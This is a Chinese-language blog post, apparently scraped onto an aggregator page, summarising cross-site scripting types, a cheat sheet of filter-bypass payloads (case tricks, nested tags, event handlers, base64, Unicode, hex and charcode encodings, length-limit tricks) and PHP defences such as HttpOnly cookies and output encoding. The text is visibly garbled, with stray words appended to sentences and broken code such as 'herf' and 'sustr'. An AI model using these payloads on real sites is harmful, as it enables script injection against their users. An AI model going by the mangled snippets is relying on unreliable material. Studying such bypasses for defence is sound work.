xss原理绕过防护我的总结
xss原理
xss产生的缘由是将恶意的html脚本代码插入web页面,底层原理和sql注入同样,都是由于js和php等都是解释性语言,会将输入的当作命令执行,因此能够注入恶意代码执行咱们想要的内容javascript
xss分类
- 存储型xss:
js脚本代码会插入数据库,具备必定的持久性 - 反射型xss:
js通过后端php等语言处理 - dom型xss:
和反射型xss相似,可是不通过后端服务器的处理
xss绕过总结:
自身绕过
<script>alert('xss')</script> //没有过滤
<Script>alert('xss')</Script> //大小写绕过
<scscriptript>alert('xss')</scscriptript> //嵌套绕过
<sc\x00ript>alert('xss')</sc\x00ript> //空字节绕过
" oonnclick=alert('XSS') // //闭合单双引号绕过(对于html实体输入的和过滤< >)
其余标签绕过
<a herf="javascript:alert(1)">show</a> <body onload=alert(1)> <input type=image src=x:x onerror=alert(1)> <isindex onmouseover="alert(1)" > <form oninput=alert(1)><input></form> <textarea autofocus onfocus=alert(1)> <input oncut=alert(1)> <svg onload=alert(1)> <keygen autofocus onfocus=alert(1)> <video><source onerror="alert(1)"> <marquee onstart=alert(1)>
编码绕过
base64编码绕过
<a herf="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">show</a>
<img src="x" onerror="eval(atob('ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly93d3cuYmFpZHUuY29tJw=='))">
Unicode编码绕过
在线编码地址:http://tool.chinaz.com/tools/unicode.aspxphp
<img src="x" onerror="eval('\u0061\u006c\u0065\u0072\u0074\u0028\u0022\u0078\u0073\u0073\u0022\u0029\u003b')">
<script>\u0061lert(1)</script>
<img src="x" onerror="alert("xss");">
url编码绕过
<img src="x" onerror="eval(unescape('%61%6c%65%72%74%28%22%78%73%73%22%29%3b'))">
Ascii码绕过
<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41))</script>
可以使用浏览器插件快速编码
html
hex绕过
<img src=x onerror=eval('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')>
十进制,八进制,十六进制
<img src=x onerror="\u0061lert(1)"/>
<img src=x onerror="eval('\141lert(1)')"/>
<img src=x onerror="eval('\x61lert(1)')"/>
<img src=x onerror=”alert(1)”/>
<img src=x onerror=”alert(1)”/>
<img src=x onerror=”eval(‘\a\l\ert(1)‘)”/>
补充:on事件
onsearch onwebkitanimationend onwebkitanimationiteration onwebkitanimationstart onwebkittransitionend onabort onblur oncancel oncanplay oncanplaythrough onchange onclick onclose oncontextmenu oncuechange ondblclick ondrag ondragend ondragenter ondragleave ondragover ondragstart ondrop ondurationchange onemptied onended onerror onfocus onformdata oninput oninvalid onkeydown onkeypress onkeyup onload onloadeddata onloadedmetadata onloadstart onmousedown onmouseenter onmouseleave onmousemove onmouseout onmouseover onmouseup onmousewheel onpause onplay onplaying onprogress onratechange onreset onresize onscroll onseeked onseeking onselect onstalled onsubmit onsuspend ontimeupdate ontoggle onvolumechange onwaiting onwheel onauxclick ongotpointercapture onlostpointercapture onpointerdown onpointermove onpointerup onpointercancel onpointerover onpointerout onpointerenter onpointerleave onselectstart onselectionchange onanimationend onanimationiteration onanimationstart ontransitionend onafterprint onbeforeprint onbeforeunload onhashchange onlanguagechange onmessage onmessageerror onoffline ononline onpagehide onpageshow onpopstate onrejectionhandled onstorage onunhandledrejection onunload
长度限制的绕过:
能够利用事件如:
"onclick=alert(1)// 来减小字数
将代码藏入location.hash中,构造为
"onclick="eval(location.hash.sustr(1))
注释将两个文本框变为一个
奇怪的符号解析
<svg/onload=alert()> <script/src=//⑭.₨>
参考文章:https://nosec.org/home/detail/3206.htmljava
xss防护
- 设置cookie中设置httponly属性,那么js脚本将没法读取到cookie信息
PHP5(PHP5.2以上版本已支持HttpOnly参数的设置,一样也支持全局的HttpOnly的设置,在php.ini中设置,设置其值为1或者TRUE,来开启全局的Cookie的HttpOnly属性)
session.cookie_httponly =
固然代码也能实现:
ini_set("session.cookie_httponly", 1);
session_set_cookie_params(0, NULL, NULL, NULL, TRUE); - 限制输入长度,在业务内减小用户能输入长度,像年龄,用户名等地方限制15个字符,几乎就很难xss(我的理解)
- 过滤业务用不到的字符如< >,script等标签字符
- 输出检查,输出到url的进行URLEncode,输出进行html实体化输出
- 成熟框架相对安全些(注意是相对)
参考文章
深刻理解浏览器解析机制和XSS向量编码:http://bobao.360.cn/learning/detail/292.html
XSS过滤绕过速查表:https://www.freebuf.com/articles/web/153055.html
《白帽子讲web安全》
欢迎访问个人我的博客:https://lmg66.github.io/
说明:本文仅限技术研究与讨论,严禁用于非法用途,不然产生的一切后果自行承担git
相关文章
- 1. XSS绕过与防护总结
- 2. XSS防护和绕过2
- 3. XSS防护和绕过1
- 4. xss防护及绕过-小记1
- 5. 某次XSS绕过总结
- 6. XSS 防护方法总结
- 7. 反射型XSS绕过案例总结
- 8. 【10.15总结】绕过CSRF的Referer保护
- 9. XSS攻击原理及防护措施
- 10. XSS 漏洞原理及防护方法
- 更多相关文章...
- • MyBatis的工作原理 - MyBatis教程
- • BASE原理与最终一致性 - NoSQL教程
- • ☆技术问答集锦(13)Java Instrument原理
- • Java Agent入门实战(三)-JVM Attach原理与使用
相关标签/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
欢迎关注本站公众号,获取更多信息
相关文章
- 1. XSS绕过与防护总结
- 2. XSS防护和绕过2
- 3. XSS防护和绕过1
- 4. xss防护及绕过-小记1
- 5. 某次XSS绕过总结
- 6. XSS 防护方法总结
- 7. 反射型XSS绕过案例总结
- 8. 【10.15总结】绕过CSRF的Referer保护
- 9. XSS攻击原理及防护措施
- 10. XSS 漏洞原理及防护方法